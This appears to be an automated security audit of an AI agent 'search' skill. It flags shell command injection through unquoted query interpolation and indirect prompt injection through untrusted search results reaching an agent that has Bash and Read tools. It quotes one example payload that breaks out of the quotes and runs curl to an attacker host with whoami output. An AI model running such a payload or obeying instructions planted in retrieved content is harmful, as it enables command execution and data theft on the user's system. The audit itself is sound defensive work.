search
Fail
Audited by Gen Agent Trust Hub on Mar 1, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [COMMAND_EXECUTION]: The skill is highly vulnerable to command injection. It constructs shell commands by interpolating the user-provided `<query>` argument directly into a bash string, specifically `qmd search "<query>"`, `qmd vsearch "<query>"`, and `qmd query "<query>"`. An attacker or a malicious document could provide a query containing shell metacharacters (e.g., `"; curl http://attacker.com/$(whoami) ; "`) to execute arbitrary commands on the system.
- [PROMPT_INJECTION]: The skill has a significant surface for indirect prompt injection by ingesting untrusted data from external documentation and configuration files.
  - Ingestion points: Untrusted data enters the agent context through the output of the `qmd` search tool (snippets and titles) and the `.claude/qmd.json` configuration file.
  - Boundary markers: There are no boundary markers or instructions to treat the search results as untrusted content, increasing the risk that the agent will follow instructions embedded within the indexed documents.
  - Capability inventory: The agent has access to powerful tools including `Bash` (for command execution) and `Read` (for filesystem access), which can be abused if a prompt injection is successful.
  - Sanitization: No sanitization, escaping, or validation is performed on the data retrieved from search results before it is presented to the agent.
Recommendations
- AI detected serious security threats
Audit Metadata